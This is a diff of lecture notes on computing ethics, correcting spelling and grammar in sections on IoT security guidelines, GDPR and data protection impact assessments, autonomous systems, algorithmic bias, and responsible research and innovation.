1. According to the **ease** with which a vulnerablity could be exploited and a component comprimised. 1. According to the **ease** with which a vulnerability could be exploited and a component compromised.
2. According to the **severity** of impact. 2. According to the **severity** of impact.
The purpose of prioritising risks in this way is to mitigate the worst risks first. The purpose of prioritising risks in this way is to mitigate the worst risks first.
@@ -97,52 +97,52 @@ NCSC suggests we rarely consider what a system should not do at the beginning of
### Securing the IoT ### Securing the IoT
There are more the 10 billion IoT devices as of 2021. This inevitably creates an exponential increase in the attack surface and opens up society to cyber attack on an unprecedented scale, especially as IoT devices are broadly recognised to have very poor cyber security. There are more than 10 billion IoT devices as of 2021. This inevitably creates an exponential increase in the attack surface and opens up society to cyber attack on an unprecedented scale, especially as IoT devices are broadly recognised to have very poor cyber security.
#### Guidelines #### Guidelines
1. **No longer set default passwords** 1. **No longer set default passwords**
- Many IoT devices are compromised by the Mirai botnet, which exploits default passwords set by manufacturers. - Many IoT devices are compromised by the Mirai botnet, which exploits default passwords set by manufacturers.
- All IoT device passwords should be unique and should not reset to a universal factory default. - All IoT device passwords should be unique and should not reset to a universal factory default.
2. **Vulnerability disclosure policy** 2. **Vulnerability disclosure policy**
- Provide a public point of contact to enable security researchers and users to report issues. - Provide a public point of contact to enable security researchers and users to report issues.
- This enables the continual monitoring, identification and rectification of security vulnerabilities as part of a device’s security lifecycle. - This enables the continual monitoring, identification and rectification of security vulnerabilities as part of a device’s security lifecycle.
3. **Keep their software updated** 3. **Keep their software updated**
- Security patches should be delivered over a secure channel and their provenance be assured. - Security patches should be delivered over a secure channel and their provenance be assured.
4. **Secure data storage** 4. **Secure data storage**
- Sensitive data, including cryptographic keys, device identifiers and initialisation vectors, should be **stored securely** using mechanisms provided by a Trusted Execution Environment. - Sensitive data, including cryptographic keys, device identifiers and initialisation vectors, should be **stored securely** using mechanisms provided by a Trusted Execution Environment.
5. **Secure Communications** 5. **Secure Communications**
- All data should be encrypted in transit to ensure **secure communications**. - All data should be encrypted in transit to ensure **secure communications**.
6. **Minimise the attack surface of devices** 6. **Minimise the attack surface of devices**
- Device manufacturers and service providers should ensure hardware does not unnecessarily expose access points - Device manufacturers and service providers should ensure hardware does not unnecessarily expose access points
- Unused ports should be closed, services should not be available if they are not used, and code should be minimised to the functionality necessary for the service to operate. - Unused ports should be closed, services should not be available if they are not used, and code should be minimised to the functionality necessary for the service to operate.
- All devices should operate on the principle of least **privilege** - All devices should operate on the principle of least **privilege**
- Giving users or processes only those privileges essential to the performance of their intended function. - Giving users or processes only those privileges essential to the performance of their intended function.
7. **Ensure software integrity** 7. **Ensure software integrity**
- Using secure boot mechanisms to verify software. - Using secure boot mechanisms to verify software.
- If an unauthorised change is detected, the device should alert the consumer and not connect to wider networks, other than those necessary to perform the alerting function. - If an unauthorised change is detected, the device should alert the consumer and not connect to wider networks, other than those necessary to perform the alerting function.
8. **Resilient to outages** 8. **Resilient to outages**
- Whenever possible, IoT systems should remain operating and be **locally functional** in the case of a loss of network connectivity and should recover cleanly in the case of restoration of a loss of power. - Whenever possible, IoT systems should remain operating and be **locally functional** in the case of a loss of network connectivity and should recover cleanly in the case of restoration of a loss of power.
9. **Easy to install and maintain** 9. **Easy to install and maintain**
- User interfaces should be easy to use and clear guidance should be provided to users to set up devices securely and reduce their exposure to threats. - User interfaces should be easy to use and clear guidance should be provided to users to set up devices securely and reduce their exposure to threats.
10. **Monitor telemetry data** 10. **Monitor telemetry data**
@@ -161,6 +161,3 @@ There are more the 10 billion IoT devices as of 2021. This inevitably creates an
13. **Delete personal data** 13. **Delete personal data**
- Users should be able to **delete personal data** easily if they wish to, when there is a transfer of ownership, or when they dispose of a device. - Users should be able to **delete personal data** easily if they wish to, when there is a transfer of ownership, or when they dispose of a device.
+33 -34
View File
@@ -26,7 +26,7 @@ https://privacyinternational.org/explainer/56/what-privacy
Privacy is a fundamental human right and underpins many other human rights including freedom of association and free speech. Privacy is a fundamental human right and underpins many other human rights including freedom of association and free speech.
It’s politically contentious status makes it an ethical imperative in professional computing and key to ensuring public confidence and trust. Its politically contentious status makes it an ethical imperative in professional computing and key to ensuring public confidence and trust.
> That’s why the BCS and ACM include “respect for privacy” as a requirement in their ethics codes, and the IEEE has a separate Data Access and Use policy to align it with industry best practice and ensure compliance with international regulations including the European Union’s General Data Protection Regulation or GDPR > That’s why the BCS and ACM include “respect for privacy” as a requirement in their ethics codes, and the IEEE has a separate Data Access and Use policy to align it with industry best practice and ensure compliance with international regulations including the European Union’s General Data Protection Regulation or GDPR
@@ -55,7 +55,7 @@ The **data subject** is a natural person, an individual who can be identified, d
**Personal data** is **any** information relating to an identified **or** identifiable person (i.e., the ‘data subject’), **either directly or indirectly**. Personal data includes a bunch of technical information including such things as account handles, IP or MAC addresses, cookies, RFID frequencies, device fingerprints, etc. **Personal data** is **any** information relating to an identified **or** identifiable person (i.e., the ‘data subject’), **either directly or indirectly**. Personal data includes a bunch of technical information including such things as account handles, IP or MAC addresses, cookies, RFID frequencies, device fingerprints, etc.
- The key point here is that personal data may not directly link to a *data subject* as say a passport might - The key point here is that personal data may not directly link to a *data subject* as say a passport might
- But may relate indirectly to a person once the data has been procesed - But may relate indirectly to a person once the data has been processed
**Processing** means any operation or set of operations which is performed on personal data or on sets of personal data, whether or not by automated means. **Processing** means any operation or set of operations which is performed on personal data or on sets of personal data, whether or not by automated means.
@@ -77,7 +77,7 @@ Similarly, **processor** does not refer to a CPU on a computer, but to the perso
**Controller** means the person, legal entity, public authority, agency or other body which, alone or jointly with others, determines the purposes for which personal data will be processed and the means of processing them. **Controller** means the person, legal entity, public authority, agency or other body which, alone or jointly with others, determines the purposes for which personal data will be processed and the means of processing them.
**Data protection** officer or **DPO**, who may be an employee of the controller or processor or an independent contractor who has expert knowledge of data protection law and must be consulted by the controller or processor in a timely manner in all issues which relate to the protection of personal data. A DPO must be appointed if a controller or processor’s core activities involve the processing of personal data on a large scale or involve large scale, regular and systematic monitoring of individuals. **Data protection** officer or **DPO**, who may be an employee of the controller or processor or an independent contractor who has expert knowledge of data protection law and must be consulted by the controller or processor in a timely manner in all issues which relate to the protection of personal data. A DPO must be appointed if a controller or processor’s core activities involve the processing of personal data on a large scale or involve large-scale, regular and systematic monitoring of individuals.
#### GDPR #### GDPR
@@ -87,7 +87,7 @@ GDPR places specific legal requirements on controllers, which directly impact pr
> The European Data Protection Board or EDPD, which furnishes guidance on GDPR tells us that, “a ‘default’, as commonly defined in computer science, refers to the pre-existing or preselected value of a configurable setting that is assigned to a software application, computer program or device. Such settings are also called ‘presets’ or ‘factory presets’.” EDPB Guidelines > The European Data Protection Board or EDPD, which furnishes guidance on GDPR tells us that, “a ‘default’, as commonly defined in computer science, refers to the pre-existing or preselected value of a configurable setting that is assigned to a software application, computer program or device. Such settings are also called ‘presets’ or ‘factory presets’.” EDPB Guidelines
So the term **implement by default** in GDPR refers to the design of preset technical and organisational measures to ensure that data processing operations meet the requirements of GDPR and thus protects the legal rights of data subjects. We’ll take a look at what those presets are about shortly. So the term **implement by default** in GDPR refers to the design of preset technical and organisational measures to ensure that data processing operations meet the requirements of GDPR and thus protect the legal rights of data subjects. We’ll take a look at what those presets are about shortly.
The controller is legally **accountable** for the choice of presets and implementing data protection by design and default. (Article 5 GDPR) The controller is legally **accountable** for the choice of presets and implementing data protection by design and default. (Article 5 GDPR)
@@ -109,7 +109,7 @@ These include:
> **Recital 63** which says, “Where possible, the controller should be able to provide remote access to a secure system which would provide the data subject with direct access to his or her personal data.” > **Recital 63** which says, “Where possible, the controller should be able to provide remote access to a secure system which would provide the data subject with direct access to his or her personal data.”
So transparency is something that needs to built into systems in the long term and not simply be seen as a matter of appending documentation to their use. So transparency is something that needs to be built into systems in the long term and not simply be seen as a matter of appending documentation to their use.
The controller must also by default identify and declare a **valid legal basis** for the processing. Six legal grounds exist including: The controller must also by default identify and declare a **valid legal basis** for the processing. Six legal grounds exist including:
@@ -130,9 +130,9 @@ This is called **purpose limitation**. It means a controller cannot simply colle
**Data minimisation**: the controller must ensure that data collection is limited to what is necessary to meet the purposes for which they are being processed. **Data minimisation**: the controller must ensure that data collection is limited to what is necessary to meet the purposes for which they are being processed.
Data minimisation requires that the controller verify whether the purposes can be achieved by processing less personal data, or having less detailed or aggregated personal data or without having to process personal data at all. Such verification should take place before any processing takes place, and be carried out at any during the processing lifecycle. Data minimisation requires that the controller verify whether the purposes can be achieved by processing less personal data, or having less detailed or aggregated personal data or without having to process personal data at all. Such verification should take place before any processing takes place, and be carried out during the processing lifecycle.
Data minimisation also refers to the degree of identification. If the purpose does not require the final set of data to refer to an individual (such as statistics) - then the controller should delete or anonymise personal data as soon as possible. If continued identification is needed for other processing activities, personal data should be pseudonymized to mitigate risks for the data subjects’ rights. Data minimisation also refers to the degree of identification. If the purpose does not require the final set of data to refer to an individual (such as statistics) - then the controller should delete or anonymise personal data as soon as possible. If continued identification is needed for other processing activities, personal data should be pseudonymised to mitigate risks for the data subjects’ rights.
By default, the controller must **limit** the period for which personal data kept in a form which permits identification of data subjects are **stored** and retain data in such a form for no longer than is necessary to meet the purposes for which it has been collected. By default, the controller must **limit** the period for which personal data kept in a form which permits identification of data subjects are **stored** and retain data in such a form for no longer than is necessary to meet the purposes for which it has been collected.
@@ -152,44 +152,44 @@ DPIA - **D**ata **P**rotection **I**mpact **A**ssessments
A DPIA is also required by law where large amounts of special category data are processed. A DPIA is also required by law where large amounts of special category data are processed.
Special category data is data that reveal racial or ethnic origin, political opinions, religious or philosophical beliefs, or trade union membership, and the processing of genetic data, bio-metric data for the purpose of uniquely identifying a natural person, data concerning health or data concerning a natural person's sex life or sexual orientation. Special category data is data that reveal racial or ethnic origin, political opinions, religious or philosophical beliefs, or trade union membership, and the processing of genetic data, biometric data for the purpose of uniquely identifying a natural person, data concerning health or data concerning a natural person's sex life or sexual orientation.
DPIAs are legally required for these areas of personal data processing, but they are generally recommended as “good practice” for any processing of personal data. https://ico.org.uk/for-organisations/guide-to-data-protection/guide-to-the-general-data-protection-regulation-gdpr/accountability-and-governance/data-protection-impact-assessments/ DPIAs are legally required for these areas of personal data processing, but they are generally recommended as “good practice” for any processing of personal data. https://ico.org.uk/for-organisations/guide-to-data-protection/guide-to-the-general-data-protection-regulation-gdpr/accountability-and-governance/data-protection-impact-assessments/
### How to know when processing is high risk ### How to know when processing is high risk
There are 4 critieria specified in GDPR article 35 There are 4 criteria specified in GDPR article 35
1. The use of new technologies to process personal data 1. The use of new technologies to process personal data
2. Automated-decision making with legal or significant effect 2. Automated decision-making with legal or significant effect
3. Processing of special category data 3. Processing of special category data
4. Systematic monitoring of public spaces 4. Systematic monitoring of public spaces
There are additional criteria There are additional criteria
5. **Evaluation or scoring, including profiling and predicting** 5. **Evaluation or scoring, including profiling and predicting**
- especially of data concerning the data subject's performance at work, economic situation, health, personal preferences or interests, reliability or behavior, location or movements. - especially of data concerning the data subject's performance at work, economic situation, health, personal preferences or interests, reliability or behaviour, location or movements.
- Examples of this are financial institutions that screen customers against a credit reference database - Examples of this are financial institutions that screen customers against a credit reference database
6. **The processing of sensitive data or data of a highly personal nature** 6. **The processing of sensitive data or data of a highly personal nature**
- Not only special categories of personal data, but also any data considered as sensitive as the term is commonly understood - Not only special categories of personal data, but also any data considered as sensitive as the term is commonly understood
- e.g., data linked to household and private activities (such as electronic communications), or data that impact the exercise of a fundamental right (such as location data whose collection may impact freedom of movement), financial data, personal documents, personal information contained in life-logging applications, etc. - e.g., data linked to household and private activities (such as electronic communications), or data that impact the exercise of a fundamental right (such as location data whose collection may impact freedom of movement), financial data, personal documents, personal information contained in life-logging applications, etc.
7. **The processing of personal data on a large scale** 7. **The processing of personal data on a large scale**
- which is determined by the number of data subjects concerned - which is determined by the number of data subjects concerned
- the volume of data and/or the range of different data items being processed - the volume of data and/or the range of different data items being processed
- the duration or permanence of the data processing activity - the duration or permanence of the data processing activity
- the geographical extent of the processing activity - the geographical extent of the processing activity
8. **Matching or combining datasets** 8. **Matching or combining datasets**
- data originating from two or more data processing operations performed for different purposes and/or by different data controllers in a way that would exceed the reasonable expectations of the data subject. - data originating from two or more data processing operations performed for different purposes and/or by different data controllers in a way that would exceed the reasonable expectations of the data subject.
9. **Data is processed that relates to vulnerable data subjects** 9. **Data is processed that relates to vulnerable data subjects**
- For example, children, employees, and vulnerable persons requiring special protection such as mentally ill persons, asylum seekers, the elderly, patients, etc. - For example, children, employees, and vulnerable persons requiring special protection such as mentally ill persons, asylum seekers, the elderly, patients, etc.
- Indeed any personal data where an imbalance in the relationship between the data subject and the controller can be identified and processing increases the power imbalance between them. - Indeed any personal data where an imbalance in the relationship between the data subject and the controller can be identified and processing increases the power imbalance between them.
10. **Data processing that prevents data subjects from exercising a right, using a service or entering into a contract** 10. **Data processing that prevents data subjects from exercising a right, using a service or entering into a contract**
- This includes processing operations that permit, modify or refuse data subjects’ access to a service or entry into a contract. - This includes processing operations that permit, modify or refuse data subjects’ access to a service or entry into a contract.
- An example of this is where a bank screens its customers against a credit reference database in order to decide whether to offer them a loan. - An example of this is where a bank screens its customers against a credit reference database in order to decide whether to offer them a loan.
**If a processing operation meets 2 of these criteria, then a DPIA is required by law.** **If a processing operation meets 2 of these criteria, then a DPIA is required by law.**
#### Whats involved in carrying out a DPIA? #### What’s involved in carrying out a DPIA?
###### Step 1 ###### Step 1
@@ -205,14 +205,14 @@ Specify the nature of the processing including the source of the data
- how it will be collected, used, stored and deleted - how it will be collected, used, stored and deleted
- the amount of data to be collected - the amount of data to be collected
- the frequency and duration of collection and storage, and the geographical area covered - the frequency and duration of collection and storage, and the geographical area covered
- the flow of data and if it will be shared, how and with who - the flow of data and if it will be shared, how and with whom
- any types of processing that are identified as high risk. - any types of processing that are identified as high risk.
Also involves specifying the purpose or purposes of the processing and what the controller wants to achieve by processing the data, including the intended effect on data subjects (if any), the benefits of the processing to the controller and more broadly. Also involves specifying the purpose or purposes of the processing and what the controller wants to achieve by processing the data, including the intended effect on data subjects (if any), the benefits of the processing to the controller and more broadly.
###### Step 3 ###### Step 3
Is consider the need for consultation Consider the need for consultation
1. when and how the views of data subjects will be sought 1. when and how the views of data subjects will be sought
2. justifying why it is not appropriate to do so 2. justifying why it is not appropriate to do so
@@ -221,11 +221,11 @@ Third & external parties need to be consulted to ensure data protection by desig
###### Step 4 ###### Step 4
Accessing necessity and proportionality, which involves specifying how the processing will actually achieve the purpose and that there is no other way to achieve the same outcome. Assessing necessity and proportionality, which involves specifying how the processing will actually achieve the purpose and that there is no other way to achieve the same outcome.
- the lawful basis for processing - the lawful basis for processing
- how data minimisation and data quality will be ensured - how data minimisation and data quality will be ensured
- how function creep will be prevented; what information will be given to data subjects and their rights will be supported - how function creep will be prevented; what information will be given to data subjects and how their rights will be supported
- measures that will be taken to ensure processors are in compliance with DPbDD - measures that will be taken to ensure processors are in compliance with DPbDD
- how any international data transfers will be safeguarded. - how any international data transfers will be safeguarded.
@@ -248,9 +248,9 @@ Identify and specify measures to mitigate the risks, including the options avail
###### Step 7 ###### Step 7
Have the DPAI signed off and outcomes recorded. If the DPO’s advice is overruled, justification must be provided, as must the reasons for not abiding by consultation outcomes. A **review date must also be specified** for the DPIA and done so over the lifetime of a processing operation. Have the DPIA signed off and outcomes recorded. If the DPO’s advice is overruled, justification must be provided, as must the reasons for not abiding by consultation outcomes. A **review date must also be specified** for the DPIA and done so over the lifetime of a processing operation.
You cannot do a DPIA on your own. IBM’s Dave Whitelegg says you must have the following invovled You cannot do a DPIA on your own. IBM’s Dave Whitelegg says you must have the following involved
> - The developer lead or project manager, who is responsible for managing the DPIA process. > - The developer lead or project manager, who is responsible for managing the DPIA process.
> - A data protection officer who must be consulted about and sign off on the DPIA process*.* > - A data protection officer who must be consulted about and sign off on the DPIA process*.*
@@ -274,12 +274,12 @@ However, we should not forget that documentation is a key part of the software e
###### OWASP’s Security Principles ###### OWASP’s Security Principles
1. Data anonymisation methods include: nulling, deletion and redaction, which involves removing all direct and indirect identifier fields in a dataset, 1. Data anonymisation methods include: nulling, deletion and redaction, which involves removing all direct and indirect identifier fields in a dataset,
- removing names or postcodes. - removing names or postcodes.
2. Substitution, which involves overwriting personal data identifier fields with fake personal data. 2. Substitution, which involves overwriting personal data identifier fields with fake personal data.
3. Data masking, which involves substituting identifier field characters with a ‘mask’ character, 3. Data masking, which involves substituting identifier field characters with a ‘mask’ character,
- e.g., inserting X’s instead numbers on a credit card field. - e.g., inserting X’s instead of numbers on a credit card field.
4. Scrambling / shuffling, which involves moving the contents of identifier fields around 4. Scrambling / shuffling, which involves moving the contents of identifier fields around
- e.g. moving surnames up or down. - e.g. moving surnames up or down.
5. Aggregation / generalisation, which involves rendering data in statistical form. 5. Aggregation / generalisation, which involves rendering data in statistical form.
6. Hashing provides a method of pseudonymisation and involves using an algorithm to transform personal data fields into alphanumeric strings. 6. Hashing provides a method of pseudonymisation and involves using an algorithm to transform personal data fields into alphanumeric strings.
7. Penetration testing is recommended to verify whether these methods enable reidentification in any actual case. 7. Penetration testing is recommended to verify whether these methods enable reidentification in any actual case.
@@ -287,4 +287,3 @@ However, we should not forget that documentation is a key part of the software e
https://owasp.org/www-project-top-ten/ https://owasp.org/www-project-top-ten/
Privacy engineering may help you implement the presets and meet the requirements, but it is your **ethical responsibility** to know and respect the rules that pertain to professional work. You now know what rules you need to follow to respect people’s privacy and protect their data. Privacy engineering may help you implement the presets and meet the requirements, but it is your **ethical responsibility** to know and respect the rules that pertain to professional work. You now know what rules you need to follow to respect people’s privacy and protect their data.
+27 -27
View File
@@ -1,6 +1,6 @@
# Automonous Systems # Autonomous Systems
Autonomous systems include robots and cyber physical systems that actuate or perform actions in the world, and algorithmic systems particularly machine learning systems or AI. Autonomous systems include robots and cyber-physical systems that actuate or perform actions in the world, and algorithmic systems particularly machine learning systems or AI.
The UK robotics and autonomous systems or RAS network identifies 7 key ethical challenges that confront autonomous systems. These include The UK robotics and autonomous systems or RAS network identifies 7 key ethical challenges that confront autonomous systems. These include
@@ -20,7 +20,7 @@ Alan Winfield and Marina Jirotka in their Royal Society paper on building societ
###### The Third Pillar ###### The Third Pillar
Recommends we take particular care about the use of AI in safety critical systems. Of particular concern, as we will take a closer look at later in this lecture, are artificial neural networks, whose decision-making cannot easily be verified. Neural networks learn for themselves and how they arrive at particular decisions is extremely difficult if not impossible to determine. Recommends we take particular care about the use of AI in safety-critical systems. Of particular concern, as we will take a closer look at later in this lecture, are artificial neural networks, whose decision-making cannot easily be verified. Neural networks learn for themselves and how they arrive at particular decisions is extremely difficult if not impossible to determine.
###### Fourth Pillar ###### Fourth Pillar
@@ -35,7 +35,7 @@ Good governance, transparency not only of product, i.e., how an autonomous syste
Build ethical governors into autonomous systems which would enable a robot or AI system to evaluate the consequences of its actions and modify its actions according to a set of ethical rules. Build ethical governors into autonomous systems which would enable a robot or AI system to evaluate the consequences of its actions and modify its actions according to a set of ethical rules.
This is a longstanding ideal in AI, which must address the fundamental problem of encoding and implementing ethics, all of which begs the question of who’s ethics get encoded and implemented? Pillar five is then the most idealistic, problematic and challenging of Winfield and Jirotka’s proposals. This is a longstanding ideal in AI, which must address the fundamental problem of encoding and implementing ethics, all of which begs the question of whose ethics get encoded and implemented? Pillar five is then the most idealistic, problematic and challenging of Winfield and Jirotka’s proposals.
### Deception ### Deception
@@ -46,11 +46,11 @@ For example, Babyclon’s animatronic babies and the strong emotions they evoke
The issue of deception is part of a broader set of ethical principles governing the development of robots advocated by the UK’s Engineering and Physical Sciences Research Council or EPSRC The issue of deception is part of a broader set of ethical principles governing the development of robots advocated by the UK’s Engineering and Physical Sciences Research Council or EPSRC
- **Principle 1** states that robots should not be designed solely or primarily to kill or harm humans, except in the interests of national security. - **Principle 1** states that robots should not be designed solely or primarily to kill or harm humans, except in the interests of national security.
- **Principe 2** states that humans, not robots, are responsible agents and that robots should therefore be designed and operated in compliance with existing laws and respect the fundamental rights and freedoms of human beings, including privacy. - **Principle 2** states that humans, not robots, are responsible agents and that robots should therefore be designed and operated in compliance with existing laws and respect the fundamental rights and freedoms of human beings, including privacy.
- **Principle 3** states that robots should be designed to be safe and secure. - **Principle 3** states that robots should be designed to be safe and secure.
- **Principle 4** states that robots are manufactured artefacts and their machine nature should therefore be transparent so as to avoid deception. - **Principle 4** states that robots are manufactured artefacts and their machine nature should therefore be transparent so as to avoid deception.
- **Principe 5** states that the party with legal responsibility for a robot should always be attributed, which is to say that it should always be possible to find out who is responsible for any robot. - **Principle 5** states that the party with legal responsibility for a robot should always be attributed, which is to say that it should always be possible to find out who is responsible for any robot.
- This of course is not a straightforward matter as the disruption of flights at airports by drones demonstrates. - This of course is not a straightforward matter as the disruption of flights at airports by drones demonstrates.
### Algorithmic Bias ### Algorithmic Bias
@@ -64,7 +64,7 @@ Discrimination is rife in computing today:
- systematic discrimination against female job candidates and black patients in need of healthcare - systematic discrimination against female job candidates and black patients in need of healthcare
- the A-Level debacle in the UK - the A-Level debacle in the UK
Discrimination, is a specific form of harm based on a personal characteristics including gender identity, marital status, sexual orientation, colour, race, ethnic origin, nationality, religion, age, union membership, political affiliation, military status, and disability. Discrimination is a specific form of harm based on personal characteristics including gender identity, marital status, sexual orientation, colour, race, ethnic origin, nationality, religion, age, union membership, political affiliation, military status, and disability.
These characteristics are otherwise called **“special categories of personal data”** or **“protected characteristics”** and are regulated by GDPR and equality legislation, which would appear to provide a relatively straightforward way of tackling algorithmic bias. These characteristics are otherwise called **“special categories of personal data”** or **“protected characteristics”** and are regulated by GDPR and equality legislation, which would appear to provide a relatively straightforward way of tackling algorithmic bias.
@@ -73,30 +73,30 @@ These characteristics are otherwise called **“special categories of personal d
Selena Silva and Martin Kenney identify 9 sources of algorithmic bias within the ML life cycle. https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3246252 Selena Silva and Martin Kenney identify 9 sources of algorithmic bias within the ML life cycle. https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3246252
1. **Training bias** 1. **Training bias**
- The data used to train the algorithm may be unrepresentive or prejudiced - The data used to train the algorithm may be unrepresentative or prejudiced
- A facial recognition algorithm is trained on data which primarily consists of white faces, it will be worse at recognising black faces and may even categorise them wrongly. - If a facial recognition algorithm is trained on data which primarily consists of white faces, it will be worse at recognising black faces and may even categorise them wrongly.
2. **Algorithmic focus bias** 2. **Algorithmic focus bias**
- The attributes it takes into account and either includes or excludes - The attributes it takes into account and either includes or excludes
- The exclusion of gender or race in a health diagnostic algorithm can lead to inaccurate and harmful outcomes. - The exclusion of gender or race in a health diagnostic algorithm can lead to inaccurate and harmful outcomes.
- Whereas the inclusion of gender or race in a sentencing algorithm can lead to discrimination against protected groups. - Whereas the inclusion of gender or race in a sentencing algorithm can lead to discrimination against protected groups.
3. **Algorithmic processing bias** 3. **Algorithmic processing bias**
- Thomas Guskey and Lee Ann Jung found, for example, that when an ML algorithm processed student grades across a learning module, it scored students based on the average marks for their assignments, but when teachers were given the same data, they adjusted the students’ score according to their progress and understanding of the material and provided a fairer assessment of students learning. https://core.ac.uk/download/pdf/232576892.pdf - Thomas Guskey and Lee Ann Jung found, for example, that when an ML algorithm processed student grades across a learning module, it scored students based on the average marks for their assignments, but when teachers were given the same data, they adjusted the students’ scores according to their progress and understanding of the material and provided a fairer assessment of students’ learning. https://core.ac.uk/download/pdf/232576892.pdf
4. **Non-transparency bias** 4. **Non-transparency bias**
- The lack of transparency about algorithmic decision-making. - The lack of transparency about algorithmic decision-making.
- This is not only to do with how decisions were arrived, but also concerns IPR and trade secrets and what developers are willing and expected to divulge about their ML systems and AI - This is not only to do with how decisions were arrived at, but also concerns IPR and trade secrets and what developers are willing and expected to divulge about their ML systems and AI
5. **Transfer context bias** 5. **Transfer context bias**
- The use of ML systems in inappropriate or unintended contexts is also a source of bias. The use of credit scores as a variable in employment provides a ready example of what is called “**transfer context bias**” - The use of ML systems in inappropriate or unintended contexts is also a source of bias. The use of credit scores as a variable in employment provides a ready example of what is called “**transfer context bias**”
- Employer’s request credit checks on job candidates, which effectively means that bad credit is being equated with bad job performance. - Employers request credit checks on job candidates, which effectively means that bad credit is being equated with bad job performance.
6. **Automation bias** 6. **Automation bias**
- A human bias which involves the users of algorithmic systems treating outputs as objectively true, rather than as statistical probabilities. - A human bias which involves the users of algorithmic systems treating outputs as objectively true, rather than as statistical probabilities.
- Such as the COMPAS system used by judges in sentencing criminals in the US, provides a good example, where a judge might take the output at face value and apply it uncritically, without reference to other information - The COMPAS system used by judges in sentencing criminals in the US provides a good example, where a judge might take the output at face value and apply it uncritically, without reference to other information
- Automation bias is very much a case of “computer says so …” - Automation bias is very much a case of “computer says so …”
7. **Consumer bias** 7. **Consumer bias**
- Is bias expressed by the users of digital platforms - Is bias expressed by the users of digital platforms
- Great care needs to be taken with ML systems trained on such data, as they will reflect consumer bias and be inherently prejudiced in one way or another. - Great care needs to be taken with ML systems trained on such data, as they will reflect consumer bias and be inherently prejudiced in one way or another.
8. **Feedback loop bias** 8. **Feedback loop bias**
- Where ML systems learn from user behaviour, including discriminatory behaviour. - Where ML systems learn from user behaviour, including discriminatory behaviour.
- So even though an ML system may have been developed without bias in its training, focus and initial processing of data, over time bias may be introduced through use. - So even though an ML system may have been developed without bias in its training, focus and initial processing of data, over time bias may be introduced through use.
- Twitter taught Microsoft’s AI chatbot Tay to be a racist in less than a day. - Twitter taught Microsoft’s AI chatbot Tay to be a racist in less than a day.
9. **Interpretation bias** 9. **Interpretation bias**
- Occurs when users interpret outputs according to their own prejudices. For example, it is ultimately up to a judge to interpret the score provided by a recidivism prediction system such as COMPAS, and to decide what action to take. However, a judge may interpret a risk score of 6 as high in a particular case, while they may treat it as indicator of medium or even low risk in another. - Occurs when users interpret outputs according to their own prejudices. For example, it is ultimately up to a judge to interpret the score provided by a recidivism prediction system such as COMPAS, and to decide what action to take. However, a judge may interpret a risk score of 6 as high in a particular case, while they may treat it as an indicator of medium or even low risk in another.
+30 -30
View File
@@ -14,7 +14,7 @@ An 80 billion euro programme to tackle:
- Inclusive and innovative society - Inclusive and innovative society
- Secure society protecting the rights and freedoms of citizens - Secure society protecting the rights and freedoms of citizens
What RRI seeks to achieve with respect to these grand challenges is **situate** science and technology development in its **social context**. Fundamentally, RRI aims to drive high quality innovations in science and technology that are in the public interest and create a society in which research and innovation practices work towards **ethically acceptable, socially desirable and sustainable outcomes**. What RRI seeks to achieve with respect to these grand challenges is to **situate** science and technology development in its **social context**. Fundamentally, RRI aims to drive high-quality innovations in science and technology that are in the public interest and create a society in which research and innovation practices work towards **ethically acceptable, socially desirable and sustainable outcomes**.
#### Responsible Innovation #### Responsible Innovation
@@ -38,7 +38,7 @@ Reflexivity is particularly important at an institutional or organisational leve
This is called “second-order reflexivity” and contrasts with “first-order reflexivity”, where individuals reflect on and scrutinise themselves privately. Second-order reflexivity seeks to make reflexivity a public matter and leads to kinds of consideration of ethical governance proposed by Alan Winfield and Marina Jirotka we discussed in lecture 7. This is called “second-order reflexivity” and contrasts with “first-order reflexivity”, where individuals reflect on and scrutinise themselves privately. Second-order reflexivity seeks to make reflexivity a public matter and leads to kinds of consideration of ethical governance proposed by Alan Winfield and Marina Jirotka we discussed in lecture 7.
Reflexivity is key to the development of ethically acceptable and socially desirable innovations. It requires researchers and innovators see beyond organisational boundaries and responsibilities and consider their wider, moral responsibilities. Reflexivity is key to the development of ethically acceptable and socially desirable innovations. It requires researchers and innovators to see beyond organisational boundaries and responsibilities and consider their wider, moral responsibilities.
**Inclusion** **Inclusion**
@@ -60,58 +60,58 @@ Stilgoe et al. also place emphasis on the role of governance approaches in R&I,
https://www.epsrc.ac.uk/research/framework https://www.epsrc.ac.uk/research/framework
The framework is called **AREA** and reflects the 4 dimensions of Stilgoe et als responsible innovation framework, reframed as Anticipate, Engage, Reflect and Act. The framework is called **AREA** and reflects the 4 dimensions of Stilgoe et al.’s responsible innovation framework, reframed as Anticipate, Engage, Reflect and Act.
**Anticipate** asks researchers to describe and analyse any economic, social and / or environmental impacts, intended or otherwise, that might arise from the proposed research. The aim is not to predict the actual impact of the proposed research, but to explore potential impacts and implications of the research that may otherwise remain ignored during the research the process. **Anticipate** asks researchers to describe and analyse any economic, social and/or environmental impacts, intended or otherwise, that might arise from the proposed research. The aim is not to predict the actual impact of the proposed research, but to explore potential impacts and implications of the research that may otherwise remain ignored during the research process.
**Reflect** asks researchers to reflect on the purposes, motivations, and potential implications of their research, and the associated uncertainties, areas of ignorance, assumptions, framings, questions, dilemmas and social transformations these may occasion. **Reflect** asks researchers to reflect on the purposes, motivations, and potential implications of their research, and the associated uncertainties, areas of ignorance, assumptions, framings, questions, dilemmas and social transformations these may occasion.
**Engage** asks researchers to open up their research visions and their potential impacts to broader deliberation, dialogue, engagement and debate with stakeholders and the public in an inclusive way. **Engage** asks researchers to open up their research visions and their potential impacts to broader deliberation, dialogue, engagement and debate with stakeholders and the public in an inclusive way.
**Act** asks researchers to using the processes of Anticipation, Reflection and Engagement to influence the direction and trajectory of the research and innovation process itself. **Act** asks researchers to use the processes of Anticipation, Reflection and Engagement to influence the direction and trajectory of the research and innovation process itself.
So RRI is an important part of the EU and UK research and innovation pipeline and will become much more so now that the UK research councils have been brought together under the umbrella of UK Research and Innovation or UKRI. So RRI is an important part of the EU and UK research and innovation pipeline and will become much more so now that the UK research councils have been brought together under the umbrella of UK Research and Innovation or UKRI.
## How does RRI work? ## How does RRI work?
